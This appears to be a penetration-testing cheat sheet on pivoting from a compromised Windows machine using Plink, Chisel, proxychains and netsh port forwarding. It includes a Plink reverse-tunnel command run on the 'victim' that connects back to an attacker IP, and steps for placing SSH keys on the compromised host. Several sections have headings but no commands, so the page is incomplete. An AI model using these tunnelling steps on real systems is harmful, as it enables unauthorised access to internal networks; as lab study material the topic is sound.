Window
Plink
https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html
First: We need to change ssh configuration on our kali machine.
PermitRootLogin no #Change This
PermitRootLogin Yes #To This
#Then restart the service
sudo service ssh restartWe can customize the port if port 22 blocked on the report machine.
Second: Let start execute plink command on the victim machine
plink.exe -P 2222 -l root -pw toor -R 445:127.0.0.1:445 10.10.14.12


Plink with id_rsa
Create ssh-keygen and save .pub value into authorized_key
install putty tool and convert id_rsa to .ppk file
Transfer key.ppk to window machine that we compromised

on window machine, we can use plink to connect to our kali machine fore reverse port

We can access via 127.0.0.1:445
Chisel
On kali machine
on window server machine
Then we can use proxychain for remote to target machine via sock proxy
Proxychains on Window machine
Create ssh-keygen without password. It will create to file id_rsa and id_rsa.pub


copy value of idrsa.pub and paste into .ssh/authorized_key file

Transfer id_rsa file to window machine we compromise


Connect ssh back to our kali machine
Then on our kali will open port 9050

chisel
https://github.com/jpillora/chisel/releases
On server (kali machine)
On client (Window)
on /etc/proxychains4.conf
Netsh

Where:
listenaddress is the IP address to listen on (probably always 0.0.0.0).
listenport is the port to listen on.
connectaddress is the destination IP address.
connectport is the destination port.
protocol to use (always TCP).
Example:
Show the portproxy:
Remove the portproxy:
Create Local Firewall Rule before netsh
Remove Local Firewall Rule
Last updated